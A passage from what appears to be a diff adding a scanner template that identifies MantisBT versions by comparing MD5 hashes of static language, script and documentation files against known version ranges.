- method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.13.2 + dsl: + - "(\"b7a5f5bc64f730daa539ea51b482b2f4\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"629e4a5646069ae7b27085e18192b1d4\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"0a57b55d5574d86c77959a8ebf0d2c14\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"22971da1bc6a143ffaae1226c325396d\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"863fcc51ed0027311ebf8745a76bcd73\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"5316fc7077ff7ed1920d9152b5bb7f03\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"5890392a0ebf0cf492d6b4264cfab88e\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"9b7231defc0103e8cec5b0bffdd7e31c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"a506bbbdba6eea66b81f3f8d94753626\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.19.1 + dsl: + - "(\"82c851ae554fa2e9793b86ce2f1558bc\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"49633915c2d868692caa53930c802273\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8a1b98fcdbd783ca604cc2b0cd3ddd58\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"70b0083e8afc55d38e16e862c8a737e8\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"1bc0c4c9ef13db6d612e57acd7196b3a\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.4.2 + dsl: + - "(\"3ddfbc4180532d9edb83d82425145d2b\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"a44333b51d44ec46bc07575cba561ba9\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"2f0ec6d5e382551d30bf853a758d9b94\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"d342d92fe2fc78d68a82db8a0a4ec0d9\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"0c1a53d42af08c0ba18fa8dac7855bd4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d3ad78dbe41b060a0f3869b44faa05c0\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"56055630a1e2bb46c5afdaed184a2db6\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"002a86852e5160ab2ea8ff351943f317\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"8113365bdac7af1b0b3bff1303813b4e\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"376b645b4d895f56dea9f401ed41de16\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"7aa903541937ef60cc94c17fa891731f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a43e52f448bc7ecfa9cb5d30f6bacb36\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"c21fd8285ec0c0b413629c5460fbe074\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"6037a3df1ae8557a0cd1c2487237ad4b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"ea2760873f10b4a3f017c247028cfe3b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"a49305a237ad45ff98eb8f912f5af646\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/install.js" + + matchers: + - type: dsl + name: 2.5.0 - 2.22.2 + dsl: + - "(\"f026b1fe8211b613642a82a0f3e2e9f4\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"86ed962bdcccaa80de92d04ab348420b\" == md5(body))" + - type: dsl + name: 2.23.0 + dsl: + - "(\"b458e3868f56e08160ea77ed0da87ae8\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"6e0e368d89eb5542a59f69f92ca81961\" == md5(body))" + - type: dsl + name: 2.23.1 + dsl: + - "(\"36160a96d85a9a3ff100f925246a092a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.9.1 + dsl: + - "(\"5a63a186d118af15ae2359109716c582\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"876a93962696a4bea85fc87674ccae8c\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"fb9354faa67add7ffc107e87af330111\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"068e1c140e799ea2a0bf75db1bde45a6\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"51e8ce04fc1b6527361de406db8244ab\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"2ea20d2fc5c310d889138996dc34cd15\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"4f313866a196871e23ae0d56cb5e034f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"bc5adc93a61610c24bbbef0f08c60b6e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"00dc576ea14883c41c89e25cb3a720c0\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"2050664376db29e396da745bdf3c1f2a\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.19.1 + dsl: + - "(\"56792e7970362a690b52e0d2eee49884\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"712752bc02b6bbf9af273d2e597f209d\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"3163f817dfe6fac836d82f76931311a1\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"55c3b0151b8a561742b117888e1c8dad\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"42b3071a7bffaa1ccc48812cf3f4cb26\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"331aea3d962da73571cf0b59159dad24\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.4.2 + dsl: + - "(\"0d3cf694d248e8a84e39053a8b2f8c70\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"5b377da3a0d6848b21d419b1891cda6e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"16c3d78e3477981677301db4c3c3765b\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"cd7a2aa37d0504a94a135396e1b693f7\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"a87e0a77d6efd8ddbc62733d528aaefb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9f111686f7969e02acbd86f80bacfa33\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"cceef93025e7bbd7d4d379f93432a23c\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a498c0b0c4694d39ca53b227b056c4f4\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"362efff0d984ec317fb7bfbe5e1957dd\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"297777dadf85192ff8ed8a5fb81663a2\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"656f215ac5f27605321f8593e2895869\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"d3937f2ad52c8d08cb86c3c49b6f3716\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_japanese.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.16.1 + dsl: + - "(\"cae289a04d53a5227ef5b78fbcebb4dd\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.3.3 + dsl: + - "(\"e98b22fed9d9da66727d1105b99b8fbc\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"c2cd59a848abc744d523a95bad777bb4\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"da029426e501a96b761c39b2e0365247\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1f30995c94d7d5306c0c49f710da2578\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"311dd5b0988647c00e7501fb072c3af2\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"88279ba13af8cf318c3ca3dade752fe0\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"000efaea8761866c2ad82e70f91e3be5\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"2bf33a021c8a8c01897444897817c176\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"1bfa2bae41eb4c7f3bc297818fcf4b3f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a81c97634f1a6e73922fddf9721f4cca\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"4686e0fea94bab2ca75063811a6b4891\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"639206749d9c386940a2517a16216132\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.22.2 + dsl: + - "(\"f8eecad5b5d8395416524004b242955f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"59d96683044a63fb2ebb8ec173a40a2c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"947cf5d0e17a4e487766ff74bbdf1278\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/travis_before_script.sh" + + matchers: + - type: dsl + name: 2.6.0 - 2.8.1 + dsl: + - "(\"6dad2e38e3dbe34811dd26ca87a111c1\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"f99a04aea5f098890c96d7b322c2154e\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"ffa2617738a9018d4d726d5c5c737193\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.19 + dsl: + - "(\"22dc58c1ca34ee99d81b03a7399e9f6b\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.17 + dsl: + - "(\"fb4588194ace7feeb5d6645126dc88b9\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.19.1 + dsl: + - "(\"fc722a8fe9e6ca09c189c7ada9341689\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"76d7643f7a05154136a7bea7e5c1fad1\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"68d7412fe24b21eabf80641738a9edaf\" == md5(body))" + - type: dsl + name: 1.3.20 + dsl: + - "(\"bc576ad1cd7ac7b9e2e1b9a6acceaa16\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_diq.txt" + + matchers: + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"35716f4972cbc5f745c55794037bd50e\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"0960266a9cec070cc426abc43936b7d6\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c083654e0509e868b0baca60c4cd630a\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"7707714f5ccd42413e0c3471e45b5fc4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_lb.txt" + + matchers: + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"51fd4057134edd88bbf26bfbbb340c53\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"38ae54d31031a31cd4c1704b4143f60f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"31beaa61628191d78100c4c02ee8fce7\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fa03c6da02e4e4e47adce8d3d5120edb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_norwegian_nynorsk.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"6914496d0131d6276359e2655b205a1a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"945177fc6c26db83c585868a68bb6825\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"4ff52ca8ce4ea85c7132919258ecd1f0\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3df1ab14b6a9162ce565ce535607d927\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.4 + dsl: + - "(\"8d7ee7f169d93fb544295b6d671c3ba3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b4cc629cdb70ff9c7ac32c982daefd4b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"a68371fddef097533b0965e31ed79060\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"eda4374d13dab0dbada0d816c710ea73\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"0d146fe58c2d323124f9a53f6ac63d51\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: + - "(\"2cddfd3cd38b710c418a271c8534503d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_aeb.txt" + + matchers: + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"ef6e3a6bbd741065c674448297019794\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"b2a8961353c93bd666ec84803e83b262\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"5e39582e3c65a73a105af5aa78cdecdf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/customizing_mantis.sgml" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"4a93b9d27e05fd5576a43d5e4f7c40c0\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"890fabeaa183a1529f2b1ed62299747e\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.14 + dsl: + - "(\"293b874f08f7d9938a30cdc8b2ef7aa9\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"5b5add108f524f903785668ae0ba2dff\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_italian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"302643f783cf9a1ce0d5529a38196c95\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"7eeffa72fcf2184cd43c1b476e7dd7de\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f5451bda548fb3d28af244a9bb5a998d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"eebcc5ec8a7f99dd9381189e007af38c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6ee3f6b55bc452e6b059e23497bcdd5d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"4211062c360d02038698167144089ca7\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"41e60c9dfbe0f7c9dba25cd779df047e\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"9163207ce27c2990fbc3ae7fe2e16594\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_serbian_latin.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8fac11c171015c03852360d437e66e07\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"05b45cca440954cee0f9105248a51b82\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"de205eb95d4d67b86fd2f5b158d54cca\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"16f9475057b7d4674b464950e8a5bd1f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d5498d6cb82eff660aa2df24a6dc5f4a\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"45d3407cee1107f3610deacd201bf415\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_japanese.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.16.1 + dsl: + - "(\"6e51b596d0f1d7a8eb3b44ac2c21ea8a\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"a0a368537643fffbd90e42cdce510fa0\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"99705b1b122d0422280d3b7b400e6693\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"73193183ed6797b9fb8386c6964987ac\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8499372f4b42620c53294e4e3555506b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"230241273dc324f87bcdf361bf01730b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a1bea1c413ed79e30ad142f83df39383\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2c8198cdf7fc7e717f755601234be203\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"0a7488744c1aee3d0cc6e03cf85433e3\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"1a6332a6dc7ae32ab98bf26e0fdaac8d\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"86c5f7c0bfda3358e78dffe999ecd6a7\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"c4bc8254b7b64d2e07b75fdcb2d99941\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_swissgerman.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c22fe741a1d5bb7c124f0c1242839864\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d55f0fb678b5aecdd97442b36a29806c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"6fb673bb1aa8917201f6fb158833b0ac\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f67e6b38bcd3251ded2cba8c5137fafe\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"468c70cff081fd296b9d48559ddc3cf4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2adda93d96d32c92cd5a31d3975c6e0e\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d0bb8bb95480517df9c12c6bfdd0891d\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"dcaa789ba1b88337d3f13a05de4206ac\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"99eb700d0cec54afdb6350eb9e0a25a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_hebrew.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"65d0423fe436b4b15aaee0e3407e510e\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"eb699dacbc5a3cf8d278a1f84f2e7a49\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ed53e9bebf562250c44b865b7ac46065\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"c44fd0fe73ee0bb6c8b052b2c9a1667b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8ca64b0ceaaf56824271fb74f943bd0b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9837b6bf7aea1ccc1d5d5df7fda60034\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"ff432d42f3f8698797ee2d699d380d18\" == md5(body))" + - type: dsl + name: 1.2.10 - 1.2.11 + dsl: + - "(\"34ce20f3d95208f1f8a7eabc65ba34cc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"3a30d4fdf820538e0dd4c74eeb474c54\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"51acd5095f9666c31a624ef8db6cd55c\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"3b01dc5f60ed4962a42e533d48b216e7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"259ddf1eafc9318377477982418a775c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"7b3e2385b279f16616fc3e8eb67fb9e1\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d417b5ac743e137183f93afce5edccdc\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"8b765dc1413fcc4035e89b55ce438187\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_polish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"a148aa1f727a74a74e4a22f6a10e501d\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"fb59718985ee092fa0b106891b773427\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"e8b3cbc1132c46ce540eb5c289cdc09b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0db224194675214a3ab1bab5c95123e6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a7dd0be430bdc61379b0049330e168aa\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"02b79dab1a36a3561931d355a33f3c96\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"bc124dc6ac21626efb808b950c61d391\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"f368d70b56200b0979057c2e18aeb164\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"282c1d113f5489d8fad4a8344915d843\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"038ce7fded25642361a211361e0e5140\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"eb18311315a3a24fbaf80a97f07c7093\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"fddb5f43a058d367158542839df48aff\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1fa6bf28da38c8e91b40ea6d69896093\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"9245ed17b72a269fd7ac87659d46c996\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"04b8f22ca24722a97be2f52b2fa611db\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"d237c08bd9f06b62aa4ef139a877754f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"e3276d38128340b0adf386260d52d8db\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"375386a2ff94c75233f4737f06eb4fd6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"445da976bdce48a5ebbd5c095826ed3a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"998632ad32ac75fdc9c841e4ba1518c5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a17969ec39b238857a16df256c4f444a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"24f5267ba80b5c068d425cdc5f650384\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"866445ea4853329daf5a54e2f14368bd\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"8775c75982d332a15d28ee923b92425c\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b4a42508d19495b36dad7d4c7b9db1c3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_english.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"88c2ac116b26f5de5e62ef9c2462aa99\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"8b611b59a280a2bb8ee0795868272b3e\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3a9144619393c5362a945b184b2543f7\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"1546d055b70556610819394748e89833\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"aa9ea61083b18f7f893b85cb151a1dcb\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"29bfc25c783f9aeb20f9bb1061261b3e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9ea9d028a153f21d6c870d6234388498\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"19781ed227c88412715629fab8447d49\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_serbian.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"2e9c021750b05a172cdd9bd01c8dbff2\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"abb2ae3fc3380d661ad5ae319e9c0fb3\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"44e81799da1ced6a7bda5d32c65b7716\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c5c2b7a4dc659962623c442628b88c81\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2e9518a12f30680f55a2c8bc26f2fc61\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"b3f8317a5623e9748bd3d91495db4645\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"dd6d5dcee396140cd914b2a97801c85e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"6ee197eadd318905440794e2b2c997b1\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"efe6e03dddae06392ba6bc5f1529994a\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ea58338d341fb19e98b620a74f6adbf1\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"5fb548931e0d909bbfaaa50f8d9b7c38\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e21df94c56edbb739a1a3bb9138bbc63\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"3fad580ebf1501655e460306c6c9bf3c\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"3642edc58c2beca26bb825b07a8668f2\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"aee6d05d38403284d7629d18c431925a\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"ba7f8fbe5b37466f6132e25ac49419ea\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.16.1 + dsl: + - "(\"ae1f83a7e662a3abeb40f099ff5fc9ea\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"88c90e7d63148fd1c35fb68a96f07aea\" == md5(body))" + - type: dsl + name: 